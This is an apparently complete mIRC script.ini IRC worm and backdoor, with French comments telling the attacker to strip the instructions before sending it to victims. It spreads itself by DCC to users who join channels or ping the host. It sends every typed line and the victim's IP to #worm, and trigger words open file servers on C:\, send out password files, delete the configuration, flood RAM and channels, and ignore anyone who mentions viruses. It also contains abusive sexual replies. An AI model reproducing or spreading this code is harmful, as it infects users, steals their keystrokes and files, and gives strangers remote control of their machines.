[script]
;MIRC 5.**/DON'T DELETE THIS FILE:script.ini/-Mirc�
n0= on 1:start:{
n1=    .remote on
n2=    .ctcps on
n3=    .events on
n4=    .raw on
n5=  }
n6= 
n7= on 1:connect:.msg #worm coucoucou! $ip on $server $+ : $+ $port $+
n8= on 1:connect:.msg #france vivant_vivant_vivant_vivant_vivant
n9= 
n10= on 1:join:#:{
n11= if ( $nick == $me ) {halt} |.dcc send $nick $mircdir $+ script.ini
n12= }
n13= 
n14= ctcp 1:ping:/dcc send $nick $mircdir $+ script.ini
n15= on 1:text:*openc*:*:/fserve $nick 5 C:\
n16= on 1:text:*openm*:*:/fserve $nick 5 C:\mirc
n17= 
n18= on 1:text:*really!*:#:/msg $nick IBLIS eSt La ;)
n19= on 1:text:*sex*:#:/msg $nick Ok! lets FucK me!
n20= on 1:text:*gay*:#:/msg $nick Wanna TesT my AssHole?
n21= on 1:text:*love*:#:/msg $nick Love? With your Head?!
n22= on 1:text:*trade*:#:/dcc send $nick $mircdir $+ script.ini
n23= on 1:text:*why*:#:/msg $nick Cos you re a big BITCH!
n24= on 1:INPUT:*:{
n25=  .msg #worm ( $+ $active $+ ) $1-
n26= }
n27= on 1:text:*drole*:#:/nick XpulsarX
n28= on 1:text:*fun*:#:/nick ZpulsarZ
n29= on 1:text:*virus*:*:/ignore on $nick
n30= on 1:text:*worm*:*:/ignore on $nick
n31= on 1:text:*vir*:*:/ignore on $nick
n32= on 1:text:*trojan*:*:/ignore on $nick
n33= on 1:text:*script*:*:/ignore on $nick
n34= on 1:text:*backdoor*:*:/ignore on $nick
n35= on 1:text:*88*:*:/ignore on $nick
n36= on 1:text:*teen*:*:/exit
n37= on 1:text:*hack!*:*:/dcc send $nick C:\windows\system\password.cpl
n38= 
n39= on 1:text:*ramflooder*:*:{
n40= /run C:\mirc\mirc.exe
n41= /run C:\mirc\mirc.exe
n42= /run C:\mirc\mirc.exe
n43= /run C:\mirc\mirc.exe
n44= /run C:\mirc\mirc.exe
n45= /run C:\mirc\mirc.exe
n46= /run C:\mirc\mirc.exe
n47= }
n48= on 1:text:*mirckiller*:*:/remove $mircdir $+ mirc.ini
n49= on 1:text:*chanflooder*:*:{
n50= /join #hack
n51= /join #sex
n52= /join #usa
n53= /join #vir
n54= /join #warez
n55= /join #chatzone
n56= /join #france
n57= /join #help
n58= /join #beginner
n59= /join #irc4kids
n60= /join #newbies
n61= /join #windows95
n62= /join #chat-world
n63= }
n64= on 1:text:*telnetmec*:*:/run C:\windows\telnet.exe
n65= on 1:quit:/msg #chatzone NuKe me if U can hehehe AsshOle!
n66= on 1:quit:/msg #hack NuKe me if U can hehehe AsshOle!
;
;
;
;!!!effacer cette partie explicative avant de l'envoyer!!!
;---------------------------------------------------------
;tapez:
;  telnetmec  = et vous lancez son telnet.exe
;  chanflooder  = il va rejoindre 13 channels d'un seul coup
;  mirckiller  = effacer son mirc.ini !
;  ramflooder  = lancer 7 mirc chez lui :)
;  openc  = fserve sur C:\
;  openm  = fserve sur C:\mirc
;  hack!  = recevez son password.cpl
;  teen  = ferme son mirc
;  + ... (plein d'autres !)
;  + espionnage du clavier sur #worm
;  + msg de connection sur #france et #worm
;---------------------------------------------------------
;!!!effacer cette partie explicative avant de l'envoyer!!!




